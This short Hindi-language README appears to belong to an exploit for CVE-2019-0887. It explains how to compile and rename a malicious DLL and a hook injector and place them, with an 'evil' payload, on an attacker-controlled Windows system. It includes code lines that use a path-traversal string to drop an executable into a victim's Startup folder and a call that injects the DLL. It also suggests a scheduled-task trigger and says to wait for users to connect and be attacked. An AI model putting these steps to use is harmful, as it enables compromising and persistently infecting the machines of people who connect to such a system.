
CVE-2019-0887 के लिए एक्सप्लॉइट
CVE-2019-0887 को संकलित करें, इसका नाम बदलकर winhlp.dll रखें।
Install_Hook को संकलित करें, इसका नाम बदलकर hook.exe रखें।
सावधान रहें, इन्हें x64 के साथ संकलित किया जाना चाहिए।
फिर उन्हें उस दुष्ट (evil) सिस्टम में डालें, ठीक इस प्रकार:
c:\windows\hook.exe
c:\windows\winhlp.dll
c:\windows\winhlp64.exe # something evil
यदि कोई पथ बदलना चाहता है, तो यहाँ बिंदु है:
# CVE-2019-0887/dllmain.cpp
WCHAR evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };
# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");
शायद एक कार्य योजना (Task Plan) बनाने के लिए taskschd.msc का उपयोग करें, एक ट्रिगर "उपयोगकर्ता सत्र से कनेक्शन पर" सेट करें और hook.exe का फ़ाइलपथ सेट करें।
कुछ लोगों के मेरे दुष्ट सिस्टम से जुड़ने, कुछ कॉपी करने, और फिर हमला करने की प्रतीक्षा करें...
टिप्स: DLL हाईजैक का उपयोग क्यों नहीं करते?